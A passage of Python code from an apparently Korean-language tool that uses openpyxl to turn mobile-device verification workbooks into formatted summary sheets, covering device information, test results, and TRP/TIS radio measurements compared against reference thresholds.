                temp_data['배터리 용량 (mAh)'] = str(sheet_in['K8'].value) + 'mAh'
                self.battery_spec = float(sheet_in['K8'].value)
                temp_data['검증 차수'] = sheet_in['C9'].value
                temp_data['검증 기간'] = sheet_in['K5'].value

                # write to the output workbook
                sheet_out = wb_output['검증결과요약']
                # sheet row 3 handle
                sheet_out.merge_cells('B3:C3')
                sheet_out['B3'] = "1. 단말 기본 정보"
                # sheet row 4 handle
                sheet_out.merge_cells('B4:C4')
                sheet_out.merge_cells('D4:E4')
                sheet_out['B4'] = "팻네임 / 모델명"
                sheet_out['D4'] = temp_data['팻네임 / 모델명']
                # sheet row 5 handle
                sheet_out.merge_cells('B5:C5')
                sheet_out.merge_cells('D5:E5')
                sheet_out['B5'] = "OS 및 Binary Version"
                sheet_out['D5'] = temp_data['OS 및 Binary Version']
                # sheet row 6 handle
                sheet_out.merge_cells('B6:C6')
                sheet_out.merge_cells('D6:E6')
                sheet_out['B6'] = "Chipset (AP / CP)"
                sheet_out['D6'] = temp_data['Chipset (AP / CP)']
                # sheet row 7 handle
                sheet_out.merge_cells('B7:C7')
                sheet_out.merge_cells('D7:E7')
                sheet_out['B7'] = "가로 폭 (mm) / Display Size (inch)"
                sheet_out['D7'] = temp_data['가로 폭 (mm) / Display Size (inch)']
                # sheet row 8 handle
                sheet_out.merge_cells('B8:C8')
                sheet_out.merge_cells('D8:E8')
                sheet_out['B8'] = "배터리 용량 (mAh)"
                sheet_out['D8'] = temp_data['배터리 용량 (mAh)']
                # sheet row 10 handle
                sheet_out.merge_cells('B10:C10')
                sheet_out['B10'] = "2. 검증 차수 및 검증 기간"
                # sheet row 11 handle
                sheet_out.merge_cells('B11:C11')
                sheet_out.merge_cells('D11:E11')
                sheet_out['B11'] = "검증 차수"
                sheet_out['D11'] = temp_data['검증 차수']
                # sheet row 12 handle
                sheet_out.merge_cells('B12:C12')
                sheet_out.merge_cells('D12:E12')
                sheet_out['B12'] = "검증 기간"
                sheet_out['D12'] = temp_data['검증 기간']
                # sheet row 14 handle
                sheet_out.merge_cells('B14:D14')
                sheet_out['B14'] = '3. 검증 결과 (항목수 : 00, Test Case 수 : 78)'
                # sheet row 15 handle
                sheet_out.merge_cells('B15:C15')
                sheet_out['B15'] = '항목'
                sheet_out['D15'] = 'Pass'
                sheet_out['E15'] = 'Fail'
                # sheet row 16 handle
                sheet_out.merge_cells('B16:B19')
                sheet_out['B16'] = 'RF성능'
                sheet_out['C16'] = 'TRP'
                # sheet row 17 handle
                sheet_out['C17'] = 'TIS'
                # sheet row 18 handle
                sheet_out['C18'] = '속도'
                # sheet row 19 handle
                sheet_out['C19'] = 'Call Setup Test'
                # sheet row 20 handle
                sheet_out.merge_cells('B20:C20')
                sheet_out['B20'] = 'MOS'
                # sheet row 21 handle
                sheet_out.merge_cells('B21:C21')
                sheet_out['B21'] = '배터리소모전류 (시간)'
                # sheet row 22 handle
                sheet_out.merge_cells('B22:C22')
                sheet_out['B22'] = '주파수동조'
                # sheet row 23 handle
                sheet_out.merge_cells('B23:C23')
                sheet_out['B23'] = '발열'
                sheet_out['D23'] = ''
                sheet_out['E23'] = ''
                # sheet row 24 handle
                sheet_out.merge_cells('B24:C24')
                sheet_out['B24'] = '소계'
                sheet_out['D24'] = ''
                sheet_out['E24'] = ''
                # sheet row 25 handle
                sheet_out.merge_cells('B25:C25')
                sheet_out.merge_cells('D25:E25')
                sheet_out['B25'] = '점수 (가/감점)'
                sheet_out['D25'] = '86.9(+12)'
                # sheet row 26 handle
                sheet_out.merge_cells('B26:C26')
                sheet_out.merge_cells('D26:E26')
                sheet_out['B26'] = '배터리소모전류 (DOU, Test case : 35)'
                sheet_out['D26'] = '1.44일'
                # sheet rows 28 ~ 29 handle
                sheet_out.merge_cells('B28:E28')
                sheet_out.merge_cells('B29:E29')
                sheet_out['B28'] = '4. 특이사항'
                sheet_out['B29'] = ''

                self.setPrintText('/s {}번 파일 "검증결과요약" 테이터 입력 완료 /e'.format(idx+1))
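
                # Cell map written above (검증결과요약 sheet):
                #   B3,  B4:E8    section 1, basic device info
                #   B10, B11:E12  section 2, verification round and period
                #   B14, B15:E26  section 3, result matrix and scores
                #   B28, B29      section 4, remarks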
                if self.opFlag:

                    # all cell alignment adjust
                    for mCell in sheet_out["B3:E26"]:
                        for cell in mCell:
                            cell.alignment = self.general_alignment

                    for mCell in sheet_out["B29:E29"]:
                        for cell in mCell:
                            cell.alignment = self.top_alignment_3

                    # each column width adjust
                    sheet_cell_list = ['A', 'B', 'C', 'D', 'E']
                    sheet_width_list = [3.38, 20, 20, 20, 20]
                    for i in range(len(sheet_cell_list)):
                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]
                    sheet_out.row_dimensions[29].height = 85.5

                    # Set style on Cell
                    # row 3
                    sheet_out['B3'].font = self.top_font
                    sheet_out['B3'].alignment = self.top_alignment
                    # row 4
                    sheet_out['B4'].font = self.index_font
                    sheet_out['B4'].fill = self.brown_fill
                    sheet_out['B4'].border = self.thin_border
                    sheet_out['D4'].font = self.index_font
                    sheet_out['D4'].border = self.thin_border
                    sheet_out['C4'].border = self.thin_border
                    sheet_out['E4'].border = self.thin_border
                    # row 5
                    sheet_out['B5'].font = self.index_font
                    sheet_out['B5'].fill = self.brown_fill
                    sheet_out['B5'].border = self.thin_border
                    sheet_out['D5'].font = self.index_font
                    sheet_out['D5'].border = self.thin_border
                    sheet_out['C5'].border = self.thin_border
                    sheet_out['E5'].border = self.thin_border
                    # row 6
                    sheet_out['B6'].font = self.index_font
                    sheet_out['B6'].fill = self.brown_fill
                    sheet_out['B6'].border = self.thin_border
                    sheet_out['D6'].font = self.index_font
                    sheet_out['D6'].border = self.thin_border
                    sheet_out['C6'].border = self.thin_border
                    sheet_out['E6'].border = self.thin_border
                    # row 7
                    sheet_out['B7'].font = self.index_font
                    sheet_out['B7'].fill = self.brown_fill
                    sheet_out['B7'].border = self.thin_border
                    sheet_out['D7'].font = self.index_font
                    sheet_out['D7'].border = self.thin_border
                    sheet_out['C7'].border = self.thin_border
                    sheet_out['E7'].border = self.thin_border
                    # row 8
                    sheet_out['B8'].font = self.index_font
                    sheet_out['B8'].fill = self.brown_fill
                    sheet_out['B8'].border = self.thin_border
                    sheet_out['D8'].font = self.index_font
                    sheet_out['D8'].border = self.thin_border
                    sheet_out['C8'].border = self.thin_border
                    sheet_out['E8'].border = self.thin_border
                    # row 10
                    sheet_out['B10'].font = self.top_font
                    sheet_out['B10'].alignment = self.top_alignment
                    # row 11
                    sheet_out['B11'].font = self.index_font
                    sheet_out['B11'].fill = self.brown_fill
                    sheet_out['B11'].border = self.thin_border
                    sheet_out['C11'].font = self.index_font
                    sheet_out['C11'].border = self.thin_border
                    sheet_out['D11'].border = self.thin_border
                    sheet_out['D11'].font = self.index_font
                    sheet_out['E11'].border = self.thin_border
                    # row 12
                    sheet_out['B12'].font = self.index_font
                    sheet_out['B12'].fill = self.brown_fill
                    sheet_out['B12'].border = self.thin_border
                    sheet_out['C12'].font = self.index_font
                    sheet_out['C12'].border = self.thin_border
                    sheet_out['D12'].border = self.thin_border
                    sheet_out['D12'].font = self.index_font
                    sheet_out['E12'].border = self.thin_border
                    # row 14
                    sheet_out['B14'].font = self.top_font
                    sheet_out['B14'].alignment = self.top_alignment
                    # row 15
                    sheet_out['B15'].font = self.index_font
                    sheet_out['B15'].fill = self.brown_fill
                    sheet_out['B15'].border = self.thin_border
                    sheet_out['D15'].font = self.index_font
                    sheet_out['D15'].fill = self.brown_fill
                    sheet_out['D15'].border = self.thin_border
                    sheet_out['E15'].font = self.index_font
                    sheet_out['E15'].fill = self.brown_fill
                    sheet_out['E15'].border = self.thin_border
                    sheet_out['C15'].border = self.thin_border
                    # row 16
                    sheet_out['B16'].font = self.index_font
                    sheet_out['B16'].fill = self.gray_fill
                    sheet_out['B16'].border = self.thin_border
                    sheet_out['C16'].font = self.index_font
                    sheet_out['C16'].fill = self.gray_fill
                    sheet_out['C16'].border = self.thin_border
                    sheet_out['D16'].font = self.index_font
                    sheet_out['D16'].border = self.thin_border
                    sheet_out['E16'].font = self.index_font
                    sheet_out['E16'].border = self.thin_border
                    # row 17
                    sheet_out['B17'].border = self.thin_border
                    sheet_out['C17'].font = self.index_font
                    sheet_out['C17'].fill = self.gray_fill
                    sheet_out['C17'].border = self.thin_border
                    sheet_out['D17'].font = self.index_font
                    sheet_out['D17'].border = self.thin_border
                    sheet_out['E17'].font = self.index_font
                    sheet_out['E17'].border = self.thin_border
                    # row 18
                    sheet_out['B18'].border = self.thin_border
                    sheet_out['C18'].font = self.index_font
                    sheet_out['C18'].fill = self.gray_fill
                    sheet_out['C18'].border = self.thin_border
                    sheet_out['D18'].font = self.index_font
                    sheet_out['D18'].border = self.thin_border
                    sheet_out['E18'].font = self.index_font
                    sheet_out['E18'].border = self.thin_border
                    # row 19
                    sheet_out['B19'].border = self.thin_border
                    sheet_out['C19'].font = self.index_font
                    sheet_out['C19'].fill = self.gray_fill
                    sheet_out['C19'].border = self.thin_border
                    sheet_out['D19'].font = self.index_font
                    sheet_out['D19'].border = self.thin_border
                    sheet_out['E19'].font = self.index_font
                    sheet_out['E19'].border = self.thin_border
                    # row 20
                    sheet_out['B20'].font = self.index_font
                    sheet_out['B20'].fill = self.gray_fill
                    sheet_out['B20'].border = self.thin_border
                    sheet_out['D20'].font = self.index_font
                    sheet_out['D20'].border = self.thin_border
                    sheet_out['E20'].font = self.index_font
                    sheet_out['E20'].border = self.thin_border
                    sheet_out['C20'].border = self.thin_border
                    # row 21
                    sheet_out['B21'].font = self.index_font
                    sheet_out['B21'].fill = self.gray_fill
                    sheet_out['B21'].border = self.thin_border
                    sheet_out['D21'].font = self.index_font
                    sheet_out['D21'].border = self.thin_border
                    sheet_out['E21'].font = self.index_font
                    sheet_out['E21'].border = self.thin_border
                    sheet_out['C21'].border = self.thin_border
                    # row 22
                    sheet_out['B22'].font = self.index_font
                    sheet_out['B22'].fill = self.gray_fill
                    sheet_out['B22'].border = self.thin_border
                    sheet_out['D22'].font = self.index_font
                    sheet_out['D22'].border = self.thin_border
                    sheet_out['E22'].font = self.index_font
                    sheet_out['E22'].border = self.thin_border
                    sheet_out['C22'].border = self.thin_border
                    # row 23
                    sheet_out['B23'].font = self.index_font
                    sheet_out['B23'].fill = self.gray_fill
                    sheet_out['B23'].border = self.thin_border
                    sheet_out['D23'].font = self.index_font
                    sheet_out['D23'].border = self.thin_border
                    sheet_out['E23'].font = self.index_font
                    sheet_out['E23'].border = self.thin_border
                    sheet_out['C23'].border = self.thin_border
                    # row 24
                    sheet_out['B24'].font = self.index_font
                    sheet_out['B24'].fill = self.light_brown_fill
                    sheet_out['B24'].border = self.thin_border
                    sheet_out['D24'].font = self.index_font
                    sheet_out['D24'].fill = self.light_brown_fill
                    sheet_out['D24'].border = self.thin_border
                    sheet_out['C24'].border = self.thin_border
                    sheet_out['E24'].border = self.thin_border
                    sheet_out['E24'].fill = self.light_brown_fill
                    # row 25
                    sheet_out['B25'].font = self.index_font
                    sheet_out['B25'].fill = self.light_brown_fill
                    sheet_out['B25'].border = self.thin_border
                    sheet_out['D25'].font = self.index_font
                    sheet_out['D25'].fill = self.light_brown_fill
                    sheet_out['D25'].border = self.thin_border
                    sheet_out['C25'].border = self.thin_border
                    sheet_out['E25'].border = self.thin_border
                    # row 26
                    sheet_out['B26'].font = self.index_font
                    sheet_out['B26'].fill = self.gray_fill
                    sheet_out['B26'].border = self.thin_border
                    sheet_out['D26'].font = self.index_font
                    sheet_out['D26'].fill = self.light_brown_fill
                    sheet_out['D26'].border = self.thin_border
                    sheet_out['C26'].border = self.thin_border
                    sheet_out['E26'].border = self.thin_border
                    # row 28
                    sheet_out['B28'].font = self.index_font
                    # row 29
                    sheet_out['B29'].font = self.index_font
                    sheet_out['B29'].border = self.thin_border
                    sheet_out['C29'].border = self.thin_border
                    sheet_out['D29'].border = self.thin_border
                    sheet_out['E29'].border = self.thin_border

                    self.currentRow = self.currentRow + 1
                    self.setPrintText('/s {}번 파일 "검증요약결과" 시트 스타일 적용 완료 /e'.format(idx+1))
                # save file
                wb_output.save(self.list_out_files[idx])
        except:
            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno) + ' /e')
            self.end_count = "y"
            self.end_flag.emit()
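
    # Each *_generate_data method below follows the same pattern as the one
    # above: copy values from the input workbook, optionally style the sheet
    # when opFlag is set, save the output workbook per input file, and on any
    # exception report the error location via setPrintText and raise end_flag.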
sheet_out['E15'] = sheet_in['E15'].value\n sheet_out['E16'] = sheet_in['E16'].value\n sheet_out['E17'] = sheet_in['E17'].value\n sheet_out['E18'] = sheet_in['E18'].value\n sheet_out['E19'] = sheet_in['E19'].value\n sheet_out['E20'] = sheet_in['E20'].value\n\n # sheet 21 ~ 24 handle\n sheet_out.merge_cells('B21:C24')\n sheet_out['B21'] = sheet_in['B21'].value\n sheet_out.merge_cells('D21:D22')\n sheet_out['D21'] = sheet_in['D21'].value\n sheet_out.merge_cells('D23:D24')\n sheet_out['D23'] = sheet_in['D23'].value\n sheet_out['E21'] = sheet_in['E21'].value\n sheet_out['E22'] = sheet_in['E22'].value\n sheet_out['E23'] = sheet_in['E23'].value\n sheet_out['E24'] = sheet_in['E24'].value\n\n #sheet 25 ~ 28 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out['B25'] = sheet_in['B25'].value\n sheet_out.merge_cells('D25:E25')\n sheet_out['D25'] = sheet_in['D25'].value\n sheet_out.merge_cells('B26:C26')\n sheet_out['B26'] = sheet_in['B26'].value\n sheet_out.merge_cells('D26:E26')\n sheet_out['D26'] = sheet_in['D26'].value\n sheet_out.merge_cells('B27:C27')\n sheet_out['B27'] = '발열'\n sheet_out.merge_cells('D27:E27')\n sheet_out['D27'] = 'Live Streaming (충전/미충전), 게임(충전/미충전)'\n sheet_out.merge_cells('B28:E28')\n sheet_out['B28'] = sheet_in['B27'].value\n sheet_out.merge_cells('B29:C29')\n sheet_out['B29'] = sheet_in['B28'].value\n sheet_out.merge_cells('D29:E29')\n sheet_out['D29'] = sheet_in['D28'].value\n sheet_out.merge_cells('F29:H29')\n sheet_out['F29'] = sheet_in['F28'].value\n\n self.setPrintText('/s {}번 파일 \"시험결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n for i in range(6, 27):\n\n sheet_out['F' + str(i)] = temp_data[i-6][0]\n sheet_out['G' + str(i)] = temp_data[i-6][1]\n sheet_out['H' + str(i)] = temp_data[i-6][2]\n\n sheet_out['F28'] = temp_data[21][0]\n sheet_out['G28'] = temp_data[21][1]\n sheet_out['H28'] = temp_data[21][2]\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['B2'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n sheet_out['B2'].alignment = self.general_alignment\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [3.38, 9, 14.25, 8.5, 36.75, 11.25, 11.25, 11.25]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[2].height = 26.25\n\n # Set Pattern Fill\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['D4'].fill = self.brown_fill\n sheet_out['F4'].fill = self.brown_fill\n sheet_out['F5'].fill = self.brown_fill\n sheet_out['G5'].fill = self.brown_fill\n sheet_out['H5'].fill = self.brown_fill\n\n for i in range(6, 28):\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n sheet_out['E' + str(i)].fill = self.gray_fill\n\n sheet_out['B28'].fill = self.dark_gray_fill\n sheet_out['F28'].fill = self.dark_gray_fill\n sheet_out['G28'].fill = self.dark_gray_fill\n sheet_out['H28'].fill = self.dark_gray_fill\n sheet_out['B29'].fill = self.gray_fill\n sheet_out['D29'].fill = self.gray_fill\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 
\"시험결과요약\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TRP Tab\n def trp_generate_data(self):\n # 절대값 abs\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_trp = []\n list_lte_trp = []\n list_wcdma_trp = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_trp.append(self.check_num(sheet_in['J5'].value))\n list_5g_trp.append(self.check_num(sheet_in['J6'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_trp.append(self.check_num(sheet_in['K17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C10'].value))\n list_lte_trp.append(self.check_num(sheet_in['G17'].value))\n list_lte_trp.append(self.check_num(sheet_in['G10'].value))\n list_lte_trp.append(self.check_num(sheet_in['M17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E10'].value))\n list_lte_trp.append(self.check_num(sheet_in['I17'].value))\n list_lte_trp.append(self.check_num(sheet_in['I10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_trp.append(self.check_num(sheet_in['D9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TRP']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TRP 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TRP'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'CP-OFDM (n78)'\n sheet_out['B6'] = '16.86dBm(V50S)'\n sheet_out['C6'] = list_5g_trp[0]+'dBm'\n # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_5g_trp[0]))-16.86, 2))) + 'dBm'\n sheet_out['D6'] = self.cal_comparison(16.86, list_5g_trp[0]) + 'dBm'\n sheet_out['A7'] = 'DFTs-OFDM (n78)'\n sheet_out['B7'] = '-'\n sheet_out['C7'] = list_5g_trp[1]+'dBm'\n sheet_out['D7'] = '-'\n\n # sheet row 8 and 15 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '14.00dBm'\n sheet_out['C10'] = list_lte_trp[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_trp[0]))-14.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(14.00, list_lte_trp[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '15.00dBm'\n sheet_out['C11'] = list_lte_trp[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_trp[1]))-15.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(15.00, list_lte_trp[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = '13.50dBm'\n sheet_out['C12'] = list_lte_trp[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_trp[2]))-13.50, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(13.50, list_lte_trp[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '13.00dBm'\n sheet_out['C13'] = list_lte_trp[3] + 'dBm'\n # sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_trp[3])) - 13.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(13.00, list_lte_trp[3]) 
+ 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '13.00dBm'\n sheet_out['C14'] = list_lte_trp[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_trp[4])) - 13.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(13.00, list_lte_trp[4]) + 'dBm'\n\n # sheet row 15 and 17 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '15.00dBm'\n sheet_out['C17'] = list_wcdma_trp[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_trp[0])) - 15.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(15.00, list_wcdma_trp[0]) + 'dBm'\n\n # sheet row 19 and 27 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - LTE'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['A22'] = 'Band 1 15M'\n sheet_out['B22'] = '14.00dBm'\n sheet_out['C22'] = list_lte_trp[5] + 'dBm'\n # sheet_out['D22'] = self.check_num(abs(round(abs(float(list_lte_trp[5])) - 14.00, 2))) + 'dBm'\n sheet_out['D22'] = self.cal_comparison(14.00, list_lte_trp[5]) + 'dBm'\n sheet_out['A23'] = 'Band 3 20M'\n sheet_out['B23'] = '15.00dBm'\n sheet_out['C23'] = list_lte_trp[6] + 'dBm'\n # sheet_out['D23'] = self.check_num(abs(round(abs(float(list_lte_trp[6])) - 15.00, 2))) + 'dBm'\n sheet_out['D23'] = self.cal_comparison(15.00, list_lte_trp[6]) + 'dBm'\n sheet_out['A24'] = 'Band 5 10M'\n sheet_out['B24'] = '13.50dBm'\n sheet_out['C24'] = list_lte_trp[7]+'dBm'\n # sheet_out['D24'] = self.check_num(abs(round(abs(float(list_lte_trp[7])) - 13.50, 2))) + 'dBm'\n sheet_out['D24'] = self.cal_comparison(13.50, list_lte_trp[7]) + 'dBm'\n sheet_out['A25'] = 'Band 7 20M'\n sheet_out['B25'] = '13.00dBm'\n sheet_out['C25'] = list_lte_trp[8] + 'dBm'\n # sheet_out['D25'] = self.check_num(abs(round(abs(float(list_lte_trp[8])) - 13.00, 2))) + 'dBm'\n sheet_out['D25'] = self.cal_comparison(13.00, list_lte_trp[8]) + 'dBm'\n sheet_out['A26'] = 'Band 7 10M'\n sheet_out['B26'] = '13.00dBm'\n sheet_out['C26'] = list_lte_trp[9] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_trp[9])) - 13.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(13.00, list_lte_trp[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TRP\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D7\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D26\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D26\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, 
bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 16.75, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [5, 9, 16, 21]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 7, 10, 11, 12, 13, 14, 17, 22, 23, 24, 25, 26]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TRP\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TIS Tab\n def tis_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_tis = []\n list_lte_tis = []\n list_wcdma_tis = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_tis.append(self.check_num(sheet_in['J7'].value))\n list_5g_tis.append(self.check_num(sheet_in['J8'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_tis.append(self.check_num(sheet_in['L17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D17'].value))\n list_lte_tis.append(self.check_num(sheet_in['D10'].value))\n list_lte_tis.append(self.check_num(sheet_in['H17'].value))\n list_lte_tis.append(self.check_num(sheet_in['H10'].value))\n list_lte_tis.append(self.check_num(sheet_in['N17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F17'].value))\n list_lte_tis.append(self.check_num(sheet_in['F10'].value))\n list_lte_tis.append(self.check_num(sheet_in['J17'].value))\n list_lte_tis.append(self.check_num(sheet_in['J10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_tis.append(self.check_num(sheet_in['E9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TIS']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TIS 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TIS'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'SISO (n78)'\n sheet_out['B6'] = '-'\n sheet_out['C6'] = list_5g_tis[0] + 'dBm'\n sheet_out['D6'] = '-'\n\n # sheet row 8 and 14 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '-92.00dBm'\n sheet_out['C10'] = list_lte_tis[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_tis[0])) - 92.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(92.00, list_lte_tis[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '-91.00dBm'\n sheet_out['C11'] = list_lte_tis[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_tis[1])) - 91.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(91.00, list_lte_tis[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = 
